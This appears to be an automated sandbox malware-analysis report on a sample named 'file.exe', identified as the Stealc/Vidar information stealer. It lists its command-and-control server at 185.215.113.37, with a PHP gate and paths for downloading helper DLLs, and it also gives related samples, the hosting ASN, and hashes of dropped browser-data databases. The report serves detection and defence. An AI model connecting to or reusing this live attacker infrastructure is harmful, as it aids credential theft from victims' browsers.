http://185.215.113.37/e2b1563c6670f193.php3C	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/vcruntime140.dll	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/freebl3.dll	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/vcruntime140.dll17-2476756634-1003gv	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.phption:	100%	Avira URL Cloud	malware
http://www.mozilla.com/en-US/blocklist/	0%	Avira URL Cloud	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
http://185.215.113.37/e2b1563c6670f193.php	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.phpZ	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/freebl3.dll~	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/msvcp140.dll	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/sqlite3.dll	100%	Avira URL Cloud	malware
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta	0%	Avira URL Cloud	safe
http://185.215.113.37/0d60be0de163924d/nss3.dllLocal	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/nss3.dll$u	100%	Avira URL Cloud	malware
https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg	0%	Avira URL Cloud	safe
http://185.215.113.37/0d60be0de163924d/msvcp140.dllp	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.php3	100%	Avira URL Cloud	malware
http://185.215.113.37/:	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.phpMeq	100%	Avira URL Cloud	malware
https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL	0%	Avira URL Cloud	safe
http://185.215.113.37/e2b1563c6670f193.phpieU	100%	Avira URL Cloud	malware
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477	0%	Avira URL Cloud	safe
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref	0%	Avira URL Cloud	safe
http://185.215.113.37/0d60be0de163924d/vcruntime140.dll7	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.phpAem	100%	Avira URL Cloud	malware
http://185.215.113.37e2b1563c6670f193.phpefox	0%	Avira URL Cloud	safe
http://185.215.113.37/e2b1563c6670f193.phpqe=	100%	Avira URL Cloud	malware

Name	Malicious	Antivirus Detection	Reputation
http://185.215.113.37/	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/nss3.dll	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/mozglue.dll	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/softokn3.dll	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/vcruntime140.dll	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/freebl3.dll	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.php	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/sqlite3.dll	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/msvcp140.dll	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	ECGHCBGC.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/0d60be0de163924d/softokn3.dllL	file.exe, 00000000.00000002.2260179261.0000000000753000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.php9e	file.exe, 00000000.00000002.2260179261.0000000000736000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://duckduckgo.com/ac/?q=	file.exe, 00000000.00000002.2260179261.0000000000762000.00000004.00000020.00020000.00000000.sdmp, ECGHCBGC.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.php0u	file.exe, 00000000.00000002.2260179261.0000000000762000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/nss3.dllr	file.exe, 00000000.00000002.2260179261.0000000000762000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/softokn3.dllP	file.exe, 00000000.00000002.2260179261.0000000000753000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	KJDGIJECFIEBFIDHCGHD.0.dr	false	Avira URL Cloud: safe	unknown
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.	file.exe, 00000000.00000002.2277322347.0000000029518000.00000004.00000020.00020000.00000000.sdmp, KJDGIJECFIEBFIDHCGHD.0.dr	false	Avira URL Cloud: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phppiT	file.exe, 00000000.00000002.2260179261.0000000000736000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	file.exe, 00000000.00000002.2260179261.0000000000762000.00000004.00000020.00020000.00000000.sdmp, ECGHCBGC.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37:	file.exe, 00000000.00000002.2260179261.00000000006DE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.37	file.exe, 00000000.00000002.2260179261.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.phpm	file.exe, 00000000.00000002.2260179261.0000000000736000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/msvcp140.dll(	file.exe, 00000000.00000002.2260179261.0000000000753000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/freebl3.dllZ	file.exe, 00000000.00000002.2260179261.0000000000753000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	file.exe, 00000000.00000002.2260179261.0000000000762000.00000004.00000020.00020000.00000000.sdmp, ECGHCBGC.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.php3C	file.exe, 00000000.00000002.2260179261.0000000000762000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.phpx	file.exe, 00000000.00000002.2260179261.0000000000762000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/vcruntime140.dll17-2476756634-1003gv	file.exe, 00000000.00000002.2260179261.0000000000736000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.phption:	file.exe, 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: malware	unknown
http://www.sqlite.org/copyright.html.	file.exe, 00000000.00000002.2272557365.000000001D435000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2282392158.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.mozilla.com/en-US/blocklist/	file.exe, file.exe, 00000000.00000002.2282518597.000000006C6CD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	false	Avira URL Cloud: safe	unknown
https://mozilla.org0/	freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	false	URL Reputation: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	ECGHCBGC.0.dr	false	Avira URL Cloud: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phpZ	file.exe, 00000000.00000002.2260179261.0000000000762000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/freebl3.dll~	file.exe, 00000000.00000002.2260179261.0000000000753000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	file.exe, 00000000.00000002.2260179261.0000000000762000.00000004.00000020.00020000.00000000.sdmp, ECGHCBGC.0.dr	false	URL Reputation: safe	unknown
https://www.ecosia.org/newtab/	file.exe, 00000000.00000002.2260179261.0000000000762000.00000004.00000020.00020000.00000000.sdmp, ECGHCBGC.0.dr	false	URL Reputation: safe	unknown
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta	file.exe, 00000000.00000002.2277322347.0000000029518000.00000004.00000020.00020000.00000000.sdmp, KJDGIJECFIEBFIDHCGHD.0.dr	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	KKJKKJJKJEGIECAKJJEBFBAKKE.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/0d60be0de163924d/nss3.dllLocal	file.exe, 00000000.00000002.2260179261.0000000000753000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ac.ecosia.org/autocomplete?q=	ECGHCBGC.0.dr	false	URL Reputation: safe	unknown
https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg	file.exe, 00000000.00000002.2277322347.0000000029518000.00000004.00000020.00020000.00000000.sdmp, KJDGIJECFIEBFIDHCGHD.0.dr	false	Avira URL Cloud: safe	unknown
http://185.215.113.37/0d60be0de163924d/nss3.dll$u	file.exe, 00000000.00000002.2260179261.0000000000736000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	file.exe, 00000000.00000002.2277322347.0000000029518000.00000004.00000020.00020000.00000000.sdmp, KJDGIJECFIEBFIDHCGHD.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/0d60be0de163924d/msvcp140.dllp	file.exe, 00000000.00000002.2260179261.0000000000753000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.php3	file.exe, 00000000.00000002.2260179261.0000000000762000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.37/:	file.exe, 00000000.00000002.2260179261.0000000000753000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.phpMeq	file.exe, 00000000.00000002.2260179261.0000000000736000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL	KKJKKJJKJEGIECAKJJEBFBAKKE.0.dr	false	Avira URL Cloud: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phpieU	file.exe, 00000000.00000002.2260179261.0000000000736000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref	file.exe, 00000000.00000002.2277322347.0000000029518000.00000004.00000020.00020000.00000000.sdmp, KJDGIJECFIEBFIDHCGHD.0.dr	false	Avira URL Cloud: safe	unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477	file.exe, 00000000.00000002.2277322347.0000000029518000.00000004.00000020.00020000.00000000.sdmp, KJDGIJECFIEBFIDHCGHD.0.dr	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org	KKJKKJJKJEGIECAKJJEBFBAKKE.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/0d60be0de163924d/vcruntime140.dll7	file.exe, 00000000.00000002.2260179261.0000000000753000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	ECGHCBGC.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37e2b1563c6670f193.phpefox	file.exe, 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phpAem	file.exe, 00000000.00000002.2260179261.0000000000736000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.phpqe=	file.exe, 00000000.00000002.2260179261.0000000000736000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.215.113.37	unknown	Portugal		206894	WHOLESALECONNECTIONSNL	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1519697
Start date and time:	2024-09-26 21:13:07 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 29s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1/23@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 86% Number of executed functions: 80 Number of non-executed functions: 114
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: file.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.37	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Phorpiex	Browse	185.215.113.66
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.103

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\freebl3.dll	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, PureLog Stealer	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse

Created / dropped Files

C:\ProgramData\BFBFBFIIJDAKECAKKJEHCFIJKK

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DHCFIDAK

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\ECGHCBGC

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EHJJKFCBGIDGHIECGCBKFHIEBG

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8439810553697228
Encrypted:	false
SSDEEP:	24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
MD5:	9D46F142BBCF25D0D495FF1F3A7609D3
SHA1:	629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
SHA-256:	C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
SHA-512:	AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\FHJKKECFIECAKECAFBGC

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JJDGCGHCGHCBFHJJKKJE

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KJDGIJECFIEBFIDHCGHD

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1743), with CRLF line terminators
Category:	dropped
Size (bytes):	9504
Entropy (8bit):	5.512408163813622
Encrypted:	false
SSDEEP:	192:nnPOeRnWYbBp6RJ0aX+H6SEXKxkHWNBw8D4Sl:PeegJUaJHEw90
MD5:	1191AEB8EAFD5B2D5C29DF9B62C45278
SHA1:	584A8B78810AEE6008839EF3F1AC21FD5435B990
SHA-256:	0BF10710C381F5FCF42F9006D252E6CAFD2F18840865804EA93DAA06658F409A
SHA-512:	86FF4292BF8B6433703E4E650B6A4BF12BC203EF4BBBB2BC0EEEA8A3E6CC1967ABF486EEDCE80704D1023C15487CC34B6B319421D73E033D950DBB1724ABADD5
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "9e34c6e7-cbed-40a0-ba63-35488e171013");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696426836);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696426837);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\KJDGIJECFIEBFIDHCGHDHIEBAK

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KKJKKJJKJEGIECAKJJEBFBAKKE

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.03859996294213402
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
MD5:	D2A38A463B7925FE3ABE31ECCCE66ACA
SHA1:	A1824888F9E086439B287DEA497F660F3AA4B397
SHA-256:	474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
SHA-512:	62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
